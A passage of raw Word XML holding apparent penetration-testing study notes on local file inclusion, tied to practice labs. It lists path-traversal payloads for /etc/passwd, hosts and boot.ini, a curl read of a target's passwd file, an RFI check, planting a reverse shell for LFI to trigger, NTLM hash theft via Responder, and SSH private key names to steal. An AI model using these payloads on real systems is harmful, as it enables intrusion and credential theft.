      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 'http://{target_IP}/?file=/etc/passwd' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">will print out the passwords in nice format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://unika.htb/index.php?page=french.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where it access the "french.html" from the web server, then you know the "page" parameter uses a path value. So, we can try inputting any path to get files. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows (the OS of the machine hosting the web server, the target)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../windows/system32/drivers/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../boot.ini</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the boot.ini file (Windows boot configuration))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../var/log/syslog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It usually works when there is no proper sanitization in the PHP code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mge9ejkfgxtw" w:id="234"/>
      <w:bookmarkEnd w:id="234"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What to do once you have LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have access to web server already, then put a rev shell in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then access it via website LFI to trigger it. We saw this many times in PG Practice and Challenge Labs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if you have RFI by doing something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">page=http://192.168.45.232/hello.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where you replace it with your own IP (you don't need hello.txt to exist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP wrappers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to either view full PHP pages or get command execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C40">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId561">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LFI2RCE via phpinfo()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId562">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hacktricks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">files specific to the service on the website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId563">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SPX</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId564">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DVR4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId565">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId566">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mantis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try and authenticate to a fake SMB server ur hosting via Responder to steal NTLM hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in </w:t>
      </w:r>
      <w:hyperlink r:id="rId567">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Responder</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Section of AD Notes (from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flight HTB)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/USER/.ssh/id_rsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When doing LFI, and doing stuff like stealing SSH private keys, it's not a bad idea to use CURL since it most likely formats the private key (and other) output better than the website does</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other formats to try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– most common RSA private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_dsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– older DSA private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_ecdsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – ECDSA key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was the one used in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab .245</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_ed25519</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Ed25519 key (modern, secure)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa.old, id_rsa.bak, id_rsa.backup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
